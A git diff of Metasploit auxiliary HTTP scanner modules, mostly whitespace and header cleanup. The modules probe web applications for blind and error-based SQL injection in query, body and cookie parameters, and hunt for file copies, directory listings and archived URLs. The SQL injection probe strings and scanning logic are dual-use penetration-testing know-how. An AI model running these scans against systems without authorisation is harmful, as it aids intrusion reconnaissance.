cyberspace.org' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) - + 'Version' => '$Revision$')) + register_options( [ OptString.new('METHOD', [true, "HTTP Method","GET"]), @@ -42,28 +42,28 @@ class Metasploit3 < Msf::Auxiliary OptString.new('QUERY', [ false, "HTTP URI Query", '']), OptString.new('DATA', [ false, "HTTP Body Data", '']), OptString.new('COOKIE',[ false, "HTTP Cookies", '']) - ], self.class) - + ], self.class) + end def run_host(ip) - + gvars = nil pvars = nil cvars = nil - - rnum=rand(10000) - + + rnum=rand(10000) + valstr = [ - [ 'numeric', + [ 'numeric', " AND #{rnum}=#{rnum} ", " AND #{rnum}=#{rnum+1} " - ], - [ 'single quotes', + ], + [ 'single quotes', "' AND '#{rnum}'='#{rnum}", "' AND '#{rnum}'='#{rnum+1}" ], - [ 'double quotes', + [ 'double quotes', "\" AND \"#{rnum}\"=\"#{rnum}", "\" AND \"#{rnum}\"=\"#{rnum+1}" ] @@ -72,21 +72,21 @@ class Metasploit3 < Msf::Auxiliary # # Dealing with empty query/data and making them hashes. # - + if !datastore['QUERY'] or datastore['QUERY'].empty? datastore['QUERY'] = nil gvars = nil else gvars = queryparse(datastore['QUERY']) #Now its a Hash end - + if !datastore['DATA'] or datastore['DATA'].empty? datastore['DATA'] = nil pvars = nil else pvars = queryparse(datastore['DATA']) end - + if !datastore['COOKIE'] or datastore['COOKIE'].empty? datastore['COOKIE'] = nil cvars = nil @@ -95,56 +95,56 @@ class Metasploit3 < Msf::Auxiliary end - #SEND NORMAL REQUEST - + #SEND NORMAL REQUEST + begin normalres = send_request_cgi({ 'uri' => datastore['PATH'], - 'vars_get' => gvars, + 'vars_get' => gvars, 'method' => datastore['METHOD'], 'ctype' => 'application/x-www-form-urlencoded', 'cookie' => datastore['COOKIE'], 'data' => datastore['DATA'] }, 20) - + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end - + sigtxt = "" - + if normalres if normalres.body.empty? print_error("No body to obtain signature") return else sigtxt = normalres.body - #print_status("#{sigtxt}") + #print_status("#{sigtxt}") end else print_error("No response") return end - - #print_status("Normal request sent.") + + #print_status("Normal request sent.") valstr.each do |tarr| - + #QUERY if gvars - gvars.each do |key,value| + gvars.each do |key,value| gvars = queryparse(datastore['QUERY']) #Now its a Hash - - print_status("- Testing '#{tarr[0]}' Parameter #{key}:") + + print_status("- Testing '#{tarr[0]}' Parameter #{key}:") #SEND TRUE REQUEST gvars[key] = gvars[key]+tarr[1] - - + + begin trueres = send_request_cgi({ 'uri' => datastore['PATH'], - 'vars_get' => gvars, + 'vars_get' => gvars, 'method' => datastore['METHOD'], 'ctype' => 'application/x-www-form-urlencoded', 'cookie' => datastore['COOKIE'], @@ -152,47 +152,47 @@ class Metasploit3 < Msf::Auxiliary }, 20) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end if normalres and trueres - - #Very simple way to compare responses, this can be improved alot , at this time just the simple way - - reltruesize = trueres.body.length-(trueres.body.scan(/#{tarr[1]}/).length*tarr[1].length) + + #Very simple way to compare responses, this can be improved alot , at this time just the simple way + + reltruesize = trueres.body.length-(trueres.body.scan(/#{tarr[1]}/).length*tarr[1].length) normalsize = normalres.body.length #print_status("nlen #{normalsize} reltlen #{reltruesize}") - - if reltruesize == normalsize + + if reltruesize == normalsize #If true it means that we have a small better chance of this being a blind sql injection. #SEND FALSE REQUEST - gvars[key] = gvars[key]+tarr[2] - - + gvars[key] = gvars[key]+tarr[2] + + begin falseres = send_request_cgi({ 'uri' => datastore['PATH'], - 'vars_get' => gvars, + 'vars_get' => gvars, 'method' => datastore['METHOD'], 'ctype' => 'application/x-www-form-urlencoded', 'cookie' => datastore['COOKIE'], 'data' => datastore['DATA'] }, 20) - - if falseres - #Very simple way to compare responses, this can be improved alot , at this time just the simple way + + if falseres + #Very simple way to compare responses, this can be improved alot , at this time just the simple way relfalsesize = falseres.body.length-(falseres.body.scan(/#{tarr[2]}/).length*tarr[2].length) #true_false_dist = edit_distance(falseres.body,trueres.body) - + #print_status("rellenf #{relfalsesize}") if reltruesize > relfalsesize print_status("Possible #{tarr[0]} Blind SQL Injection Found #{datastore['PATH']} #{key}") - + report_note( :host => ip, :proto => 'HTTP', @@ -201,15 +201,15 @@ class Metasploit3 < Msf::Auxiliary :data => "#{datastore['PATH']} Parameter: #{key} Type: #{tarr[0]}" ) - else - print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}") + else + print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}") end else - print_status("NO False Response.") + print_status("NO False Response.") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end else print_status("Normal and True requests are different.") @@ -220,16 +220,16 @@ class Metasploit3 < Msf::Auxiliary end end #DATA - + if pvars - pvars.each do |key,value| + pvars.each do |key,value| pvars = queryparse(datastore['DATA']) #Now its a Hash - - print_status("- Testing '#{tarr[0]}' Parameter #{key}:") + + print_status("- Testing '#{tarr[0]}' Parameter #{key}:") #SEND TRUE REQUEST pvars[key] = pvars[key]+tarr[1] - + pvarstr = "" pvars.each do |tkey,tvalue| if pvarstr @@ -237,12 +237,12 @@ class Metasploit3 < Msf::Auxiliary end pvarstr << tkey+'='+tvalue end - - + + begin trueres = send_request_cgi({ 'uri' => datastore['PATH'], - 'vars_get' => gvars, + 'vars_get' => gvars, 'method' => datastore['METHOD'], 'ctype' => 'application/x-www-form-urlencoded', 'cookie' => datastore['COOKIE'], @@ -250,55 +250,55 @@ class Metasploit3 < Msf::Auxiliary }, 20) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end if normalres and trueres - - #Very simple way to compare responses, this can be improved alot , at this time just the simple way - - reltruesize = trueres.body.length-(trueres.body.scan(/#{tarr[1]}/).length*tarr[1].length) + + #Very simple way to compare responses, this can be improved alot , at this time just the simple way + + reltruesize = trueres.body.length-(trueres.body.scan(/#{tarr[1]}/).length*tarr[1].length) normalsize = normalres.body.length #print_status("nlen #{normalsize} reltlen #{reltruesize}") - - if reltruesize == normalsize + + if reltruesize == normalsize #If true it means that we have a small better chance of this being a blind sql injection. #SEND FALSE REQUEST pvars[key] = pvars[key]+tarr[2] - + pvarstr = "" pvars.each do |tkey,tvalue| if pvarstr pvarstr << '&' end pvarstr << tkey+'='+tvalue - end - - + end + + begin falseres = send_request_cgi({ 'uri' => datastore['PATH'], - 'vars_get' => gvars, + 'vars_get' => gvars, 'method' => datastore['METHOD'], 'ctype' => 'application/x-www-form-urlencoded', 'cookie' => datastore['COOKIE'], 'data' => pvarstr }, 20) - - if falseres - #Very simple way to compare responses, this can be improved alot , at this time just the simple way + + if falseres + #Very simple way to compare responses, this can be improved alot , at this time just the simple way relfalsesize = falseres.body.length-(falseres.body.scan(/#{tarr[2]}/).length*tarr[2].length) #true_false_dist = edit_distance(falseres.body,trueres.body) - + #print_status("rellenf #{relfalsesize}") if reltruesize > relfalsesize print_status("Possible #{tarr[0]} Blind SQL Injection Found #{datastore['PATH']} #{key}") - + report_note( :host => ip, :proto => 'HTTP', @@ -307,15 +307,15 @@ class Metasploit3 < Msf::Auxiliary :data => "#{datastore['PATH']} Parameter: #{key} Type: #{tarr[0]}" ) - else - print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}") + else + print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}") end else - print_status("NO False Response.") + print_status("NO False Response.") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end else print_status("Normal and True requests are different.") @@ -324,8 +324,8 @@ class Metasploit3 < Msf::Auxiliary print_status("No response.") end end - end - - end + end + + end end end diff --git a/modules/auxiliary/scanner/http/copy_of_file.rb b/modules/auxiliary/scanner/http/copy_of_file.rb index 07a44fe22e..39ee5c3c0c 100644 --- a/modules/auxiliary/scanner/http/copy_of_file.rb +++ b/modules/auxiliary/scanner/http/copy_of_file.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -22,41 +22,41 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HTTP Copy File Scanner', 'Description' => %q{ - This module identifies the existence of possible copies + This module identifies the existence of possible copies of a specific file in a given path. }, 'Author' => [ 'et [at] cyberspace.org' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) - + 'Version' => '$Revision$')) + register_options( [ OptString.new('PATH', [ true, "The path/file to identify copies", '/index.asp']) - ], self.class) - + ], self.class) + register_advanced_options( [ OptInt.new('ErrorCode', [ true, "Error code for non existent directory", 404]), - OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use", + OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use", File.join(Msf::Config.install_root, "data", "wmap", "wmap_404s.txt") ] ), - OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ]) - ], self.class) - + OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ]) + ], self.class) + end def run_host(ip) conn = true ecode = nil emesg = nil - + ecode = datastore['ErrorCode'].to_i dm = datastore['NoDetailMessages'] - + prestr = [ 'Copy_(1)_of_', 'Copy_(2)_of_', @@ -66,18 +66,18 @@ class Metasploit3 < Msf::Auxiliary 'Copy', '_' ] - + tpathf = datastore['PATH'] testf = tpathf.split('/').last # # Detect error code - # + # begin randfile = Rex::Text.rand_text_alpha(5).chomp filec = tpathf.sub(testf,randfile + testf) - + res = send_request_cgi({ 'uri' => filec, 'method' => 'GET', @@ -85,13 +85,13 @@ class Metasploit3 < Msf::Auxiliary }, 20) return if not res - - tcode = res.code.to_i - + tcode = res.code.to_i + + # Look for a string we can signature on as well if(tcode >= 200 and tcode <= 299) - + File.open(datastore['HTTP404Sigs']).each do |str| if(res.body.index(str)) emesg = str @@ -109,10 +109,10 @@ class Metasploit3 < Msf::Auxiliary ecode = tcode print_status("Using code '#{ecode}' as not found.") end - + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - conn = false - rescue ::Timeout::Error, ::Errno::EPIPE + conn = false + rescue ::Timeout::Error, ::Errno::EPIPE end return if not conn @@ -120,24 +120,24 @@ class Metasploit3 < Msf::Auxiliary if testf prestr.each do |pre| filec = tpathf.sub(testf,pre + testf) - + begin res = send_request_cgi({ 'uri' => filec, 'method' => 'GET', 'ctype' => 'text/plain' }, 20) - + if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg)))) if dm == false - print_status("NOT Found #{filec} #{res.code} [#{wmap_target_host}] [#{res.code.to_i}]") + print_status("NOT Found #{filec} #{res.code} [#{wmap_target_host}] [#{res.code.to_i}]") end else if ecode != 400 and res.code.to_i == 400 print_error("[#{wmap_target_host}] Server returned a 400 error on #{wmap_base_url}#{filec} [#{res.code.to_i}]") - else + else print_status("[#{wmap_target_host}] Found #{wmap_base_url}#{filec} [#{res.code.to_i}]") - + report_note( :host => ip, :proto => 'HTTP', @@ -149,9 +149,9 @@ class Metasploit3 < Msf::Auxiliary end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end end - end + end end end diff --git a/modules/auxiliary/scanner/http/dir_listing.rb b/modules/auxiliary/scanner/http/dir_listing.rb index c51dfacaea..ddfae8d814 100644 --- a/modules/auxiliary/scanner/http/dir_listing.rb +++ b/modules/auxiliary/scanner/http/dir_listing.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,29 +21,29 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HTTP Directory Listing Scanner', 'Description' => %q{ - This module identifies directory listing vulnerabilities - in a given directory path. + This module identifies directory listing vulnerabilities + in a given directory path. }, 'Author' => [ 'et' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) - + 'Version' => '$Revision$')) + register_options( [ OptString.new('PATH', [ true, "The path to identify directoy listing", '/']) - ], self.class) - + ], self.class) + end def run_host(ip) - - tpath = datastore['PATH'] + + tpath = datastore['PATH'] if tpath[-1,1] != '/' tpath += '/' - end + end begin res = send_request_cgi({ @@ -51,7 +55,7 @@ class Metasploit3 < Msf::Auxiliary if (res and res.code >= 200 and res.code < 300) if res.to_s.include? "Index of /" and res.to_s.include? "<h1>Index of /" print_status("Found Directory Listing #{wmap_base_url}#{tpath}") - + report_note( :host => ip, :proto => 'HTTP', @@ -59,12 +63,12 @@ class Metasploit3 < Msf::Auxiliary :type => 'DIR_LISTING', :data => "#{tpath}" ) - + end if res.to_s.include? "[To Parent Directory]</A>" and res.to_s.include? "#{tpath}</H1><hr>" print_status("Found Directory Listing #{wmap_base_url}#{tpath}") - + report_note( :host => ip, :proto => 'HTTP', @@ -72,15 +76,15 @@ class Metasploit3 < Msf::Auxiliary :type => 'DIR_LISTING', :data => "#{tpath}" ) - + end else - print_status("NOT Vulnerable to directory listing #{wmap_base_url}#{tpath}") + print_status("NOT Vulnerable to directory listing #{wmap_base_url}#{tpath}") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end end end diff --git a/modules/auxiliary/scanner/http/enum_delicious.rb b/modules/auxiliary/scanner/http/enum_delicious.rb index 2876b6f35b..9bb16c000a 100644 --- a/modules/auxiliary/scanner/http/enum_delicious.rb +++ b/modules/auxiliary/scanner/http/enum_delicious.rb @@ -1,4 +1,7 @@ -#!/usr/bin/env ruby +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -15,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'Pull Del.icio.us Links (URLs) for a domain', - 'Description' => %q{ This module pulls and parses the URLs stored by Del.icio.us users for the + 'Description' => %q{ This module pulls and parses the URLs stored by Del.icio.us users for the purpose of replaying during a web assessment. Finding unlinked and old pages. }, 'Author' => [ 'Rob Fuller <mubix [at] hak5.org>' ], 'License' => MSF_LICENSE, @@ -23,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptString.new('DOMAIN', [ true, "Domain to request URLS for"]), - OptString.new('OUTFILE', [ false, "Where to output the list for use"]) + OptString.new('OUTFILE', [ false, "Where to output the list for use"]) ], self.class) register_advanced_options( @@ -55,30 +58,30 @@ class Metasploit3 < Msf::Auxiliary lastpage = 1 end end - + list.delete_if{|x| x==nil} list.uniq! list.sort! - + return list end - + def write_output(data) print_status("Writing URLs list to #{datastore['OUTFILE']}...") - file_name = datastore['OUTFILE'] + file_name = datastore['OUTFILE'] if FileTest::exist?(file_name) print_status("OUTFILE already existed, appending..") else print_status("OUTFILE did not exist, creating..") end - + File.open(file_name, 'a') do |fd| fd.write(data) end - - + + end - + def run if datastore['PROXY'] @proxysrv,@proxyport = datastore['PROXY'].split(":") @@ -87,21 +90,21 @@ class Metasploit3 < Msf::Auxiliary else @proxysrv,@proxyport = nil, nil end - + target = datastore['DOMAIN'] urls = [] print_status("Pulling urls from Delicious.com") urls = pull_urls(target) - + print_status("Located #{urls.count} addresses for #{target}") - - if datastore['OUTFILE'] + + if datastore['OUTFILE'] write_output(urls.join("\n") + "\n") else urls.each do |i| puts(i) - end + end end end end diff --git a/modules/auxiliary/scanner/http/enum_wayback.rb b/modules/auxiliary/scanner/http/enum_wayback.rb index c85a42876c..a8db75f847 100644 --- a/modules/auxiliary/scanner/http/enum_wayback.rb +++ b/modules/auxiliary/scanner/http/enum_wayback.rb @@ -1,4 +1,7 @@ -#!/usr/bin/env ruby +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -15,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'Pull Archive.org stored URLs for a domain', - 'Description' => %q{ This module pulls and parses the URLs stored by Archive.org for the purpose of + 'Description' => %q{ This module pulls and parses the URLs stored by Archive.org for the purpose of replaying during a web assessment. Finding unlinked and old pages. }, 'Author' => [ 'Rob Fuller <mubix [at] hak5.org>' ], 'License' => MSF_LICENSE, @@ -23,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptString.new('DOMAIN', [ true, "Domain to request URLS for"]), - OptString.new('OUTFILE', [ false, "Where to output the list for use"]) + OptString.new('OUTFILE', [ false, "Where to output the list for use"]) ], self.class) register_advanced_options( @@ -45,34 +48,34 @@ class Metasploit3 < Msf::Auxiliary response.each do |line| pages << line.gsub!(/(.+>)(.+)(<\/a><br>)\n/, '\2') end - + pages.delete_if{|x| x==nil} pages.uniq! pages.sort! - + for i in (0..(pages.count-1)) fix = "http://" + pages[i].to_s pages[i] = fix end return pages end - + def write_output(data) print_status("Writing URLs list to #{datastore['OUTFILE']}...") - file_name = datastore['OUTFILE'] + file_name = datastore['OUTFILE'] if FileTest::exist?(file_name) print_status("OUTFILE already existed, appending..") else print_status("OUTFILE did not exist, creating..") end - + File.open(file_name, 'a') do |fd| fd.write(data) end - - + + end - + def run if datastore['PROXY'] @proxysrv,@proxyport = datastore['PROXY'].split(":") @@ -81,21 +84,21 @@ class Metasploit3 < Msf::Auxiliary else @proxysrv,@proxyport = nil, nil end - + target = datastore['DOMAIN'] urls = [] print_status("Pulling urls from Archive.org") urls = pull_urls(target) - + print_status("Located #{urls.count} addresses for #{target}") - - if datastore['OUTFILE'] + + if datastore['OUTFILE'] write_output(urls.join("\n") + "\n") else urls.each do |i| puts(i) - end + end end end end diff --git a/modules/auxiliary/scanner/http/error_sql_injection.rb b/modules/auxiliary/scanner/http/error_sql_injection.rb index 551db83b32..d9ed562b64 100644 --- a/modules/auxiliary/scanner/http/error_sql_injection.rb +++ b/modules/auxiliary/scanner/http/error_sql_injection.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -24,16 +24,16 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HTTP Error Based SQL Injection Scanner', 'Description' => %q{ This module identifies the existence of Error Based SQL injection issues. Still requires alot of work - + }, 'Author' => [ 'et [at] cyberspace.org' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) - + 'Version' => '$Revision$')) + register_options( [ OptString.new('METHOD', [ true, "HTTP Method",'GET']), @@ -42,55 +42,55 @@ class Metasploit3 < Msf::Auxiliary OptString.new('DATA', [ false, "HTTP Body Data", '']), OptString.new('COOKIE',[ false, "HTTP Cookies", '']) ], self.class) - + register_advanced_options( [ OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ]) ], self.class) - + end def run_host(ip) - + gvars = nil pvars = nil cvars = nil - - - + + + sqlinj = [ [ "'" ,'Single quote'], [ "')",'Single quote and parenthesis'], [ "\"",'Double quote'], - [ "#{rand(10)}'", 'Random value with single quote'] + [ "#{rand(10)}'", 'Random value with single quote'] ] - + errorstr = [ ["Unclosed quotation mark after the character string",'MSSQL','string'], ["Syntax error in string in query expression",'MSSQL','string'], ["Microsoft OLE DB Provider",'MSSQL','unknown'], ["You have an error in your SQL syntax",'MySQL','unknown'], - ["java.sql.SQLException",'unknown','unknown'] + ["java.sql.SQLException",'unknown','unknown'] ] - + # # Dealing with empty query/data and making them hashes. # - + if !datastore['QUERY'] or datastore['QUERY'].empty? datastore['QUERY'] = nil gvars = nil else gvars = queryparse(datastore['QUERY']) #Now its a Hash end - + if !datastore['DATA'] or datastore['DATA'].empty? datastore['DATA'] = nil pvars = nil else pvars = queryparse(datastore['DATA']) end - + if !datastore['COOKIE'] or datastore['COOKIE'].empty? datastore['COOKIE'] = nil cvars = nil @@ -100,50 +100,50 @@ class Metasploit3 < Msf::Auxiliary # - # Send normal request to check if error is generated + # Send normal request to check if error is generated # (means the error is caused by other means) # # - + begin normalres = send_request_cgi({ 'uri' => datastore['PATH'], - 'vars_get' => gvars, + 'vars_get' => gvars, 'method' => datastore['METHOD'], 'ctype' => 'application/x-www-form-urlencoded', 'cookie' => datastore['COOKIE'], 'data' => datastore['DATA'] }, 20) - + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end - + if !datastore['NoDetailMessages'] - print_status("Normal request sent.") + print_status("Normal request sent.") end - + found = false inje = nil dbt = nil injt = nil - + if normalres errorstr.each do |estr,dbtype,injtype| if normalres.body.include? estr found = true inje = estr dbt = dbtype - injt = injtype + injt = injtype end end - + if found print_error("[#{wmap_target_host}] Error string appears in the normal response, unable to test") - print_error("[#{wmap_target_host}] Error string: '#{inje}'") + print_error("[#{wmap_target_host}] Error string: '#{inje}'") print_error("[#{wmap_target_host}] DB TYPE: #{dbt}, Error type '#{injt}'") - + report_note( :host => ip, :proto => 'HTTP', @@ -151,64 +151,64 @@ class Metasploit3 < Msf::Auxiliary :type => 'DATABASE_ERROR', :data => "#{datastore['PATH']} Error: #{inje} DB: #{dbt}" ) - + return end else print_error("[#{wmap_target_host}] No response") - return + return end - + # # Test URI Query parameters # - + found = false - + if gvars sqlinj.each do |istr,idesc| - - if found - break + + if found + break end - - gvars.each do |key,value| + + gvars.each do |key,value| gvars = queryparse(datastore['QUERY']) #Now its a Hash gvars[key] = gvars[key]+istr - + if !datastore['NoDetailMessages'] - print_status("- Testing query with #{idesc}. Parameter #{key}:") + print_status("- Testing query with #{idesc}. Parameter #{key}:") end - + begin testres = send_request_cgi({ 'uri' => datastore['PATH'], - 'vars_get' => gvars, + 'vars_get' => gvars, 'method' => datastore['METHOD'], 'ctype' => 'application/x-www-form-urlencoded', 'cookie' => datastore['COOKIE'], 'data' => datastore['DATA'] }, 20) - + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end - if testres + if testres errorstr.each do |estr,dbtype,injtype| if testres.body.include? estr found = true inje = estr dbt = dbtype - injt = injtype + injt = injtype end end - + if found print_status("[#{wmap_target_host}] SQL Injection found. (#{idesc}) (#{datastore['PATH']})") - print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{gvars[key]}") + print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{gvars[key]}") print_status("[#{wmap_target_host}] Vuln query parameter: #{key} DB TYPE: #{dbt}, Error type '#{injt}'") - + report_note( :host => ip, :proto => 'HTTP', @@ -216,40 +216,40 @@ class Metasploit3 < Msf::Auxiliary :type => 'SQL_INJECTION', :data => "#{datastore['PATH']} Location: QUERY Parameter: #{key} Value: #{istr} Error: #{inje} DB: #{dbt}" ) - + break end else - print_error("[#{wmap_target_host}] No response") + print_error("[#{wmap_target_host}] No response") return - end - end - end + end + end + end gvars = queryparse(datastore['QUERY']) end - + # # Test DATA parameters # - + found = false - + if pvars sqlinj.each do |istr,idesc| - - if found - break + + if found + break end - - pvars.each do |key,value| + + pvars.each do |key,value| pvars = queryparse(datastore['DATA']) #Now its a Hash - + if !datastore['NoDetailMessages'] - print_status("- Testing data with #{idesc}. Parameter #{key}:") + print_status("- Testing data with #{idesc}. Parameter #{key}:") end - + pvars[key] = pvars[key]+istr - + pvarstr = "" pvars.each do |tkey,tvalue| if pvarstr @@ -257,19 +257,19 @@ class Metasploit3 < Msf::Auxiliary end pvarstr << tkey+'='+tvalue end - + begin testres = send_request_cgi({ 'uri' => datastore['PATH'], - 'vars_get' => gvars, + 'vars_get' => gvars, 'method' => datastore['METHOD'], 'ctype' => 'application/x-www-form-urlencoded', 'cookie' => datastore['COOKIE'], 'data' => pvarstr }, 20) - + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end if testres @@ -278,15 +278,15 @@ class Metasploit3 < Msf::Auxiliary found = true inje = estr dbt = dbtype - injt = injtype + injt = injtype end end - + if found print_status("[#{wmap_target_host}] SQL Injection found. (#{idesc}) (#{datastore['PATH']})") - print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{istr}") + print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{istr}") print_status("[#{wmap_target_host}] Vuln data parameter: #{key} DB TYPE: #{dbt}, Error type '#{injt}'") - + report_note( :host => ip, :proto => 'HTTP', @@ -294,39 +294,39 @@ class Metasploit3 < Msf::Auxiliary :type => 'SQL_INJECTION', :data => "#{datastore['PATH']} Location: DATA Parameter: #{key} Value: #{istr} Error: #{inje} DB: #{dbt}" ) - + break end else - print_error("[#{wmap_target_host}] No response") + print_error("[#{wmap_target_host}] No response") return - end - end - end + end + end + end end # # Test COOKIE parameters # - + found = false - + if datastore['COOKIE'] sqlinj.each do |istr,idesc| - - if found - break + + if found + break end - - cvars.each do |key,value| + + cvars.each do |key,value| cvars = queryparse(datastore['COOKIE']) #Now its a Hash - + if !datastore['NoDetailMessages'] - print_status("- Testing cookie with #{idesc}. Parameter #{key}:") + print_status("- Testing cookie with #{idesc}. Parameter #{key}:") end - + cvars[key] = cvars[key]+istr - + cvarstr = "" cvars.each do |tkey,tvalue| if cvarstr @@ -334,19 +334,19 @@ class Metasploit3 < Msf::Auxiliary end cvarstr << tkey+'='+tvalue end - + begin testres = send_request_cgi({ 'uri' => datastore['PATH'], - 'vars_get' => gvars, + 'vars_get' => gvars, 'method' => datastore['METHOD'], 'ctype' => 'application/x-www-form-urlencoded', 'cookie' => cvarstr, 'data' => datastore['DATA'] }, 20) - + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end if testres @@ -355,15 +355,15 @@ class Metasploit3 < Msf::Auxiliary found = true inje = estr dbt = dbtype - injt = injtype + injt = injtype end end - + if found print_status("[#{wmap_target_host}] SQL Injection found. (#{idesc}) (#{datastore['PATH']})") - print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{istr}") + print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{istr}") print_status("[#{wmap_target_host}] Vuln cookie parameter: #{key} DB TYPE: #{dbt}, Error type '#{injt}'") - + report_note( :host => ip, :proto => 'HTTP', @@ -371,15 +371,15 @@ class Metasploit3 < Msf::Auxiliary :type => 'SQL_INJECTION', :data => "#{datastore['PATH']} Location: COOKIE Parameter: #{key} Value: #{istr} Error: #{inje} DB: #{dbt}" ) - + break end else - print_error("[#{wmap_target_host}] No response") + print_error("[#{wmap_target_host}] No response") return - end - end - end - end + end + end + end + end end end diff --git a/modules/auxiliary/scanner/http/file_same_name_dir.rb b/modules/auxiliary/scanner/http/file_same_name_dir.rb index 193dd84764..8624a703b3 100644 --- a/modules/auxiliary/scanner/http/file_same_name_dir.rb +++ b/modules/auxiliary/scanner/http/file_same_name_dir.rb @@ -1,6 +1,9 @@ +## +# $Id$ +## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,31 +21,31 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HTTP File Same Name Directory Scanner', 'Description' => %q{ - This module identifies the existence of files - in a given directory path named as the same name of the + This module identifies the existence of files + in a given directory path named as the same name of the directory. - Only works if PATH is differenet than '/'. + Only works if PATH is differenet than '/'. }, 'Author' => [ 'et [at] metasploit.com' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) - + 'Version' => '$Revision$')) + register_options( [ OptString.new('PATH', [ true, "The directory path to identify files", '/']), OptString.new('EXT', [ true, "File extension to use", '.aspx']) - - ], self.class) - + + ], self.class) + end def run_host(ip) - extensions = [ - '.null', + extensions = [ + '.null', '.backup', '.bak', '.c', @@ -53,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary '.html', '.htm', '.log', - '.old', + '.old', '.orig', '.tar', '.tar.gz', @@ -66,20 +69,20 @@ class Metasploit3 < Msf::Auxiliary ] tpath = datastore['PATH'] - + if tpath.eql? "/"||"" print_error("Blank or default PATH set."); return end - + if tpath[-1,1] != '/' tpath += '/' - end + end testf = tpath.split('/').last extensions << datastore['EXT'] 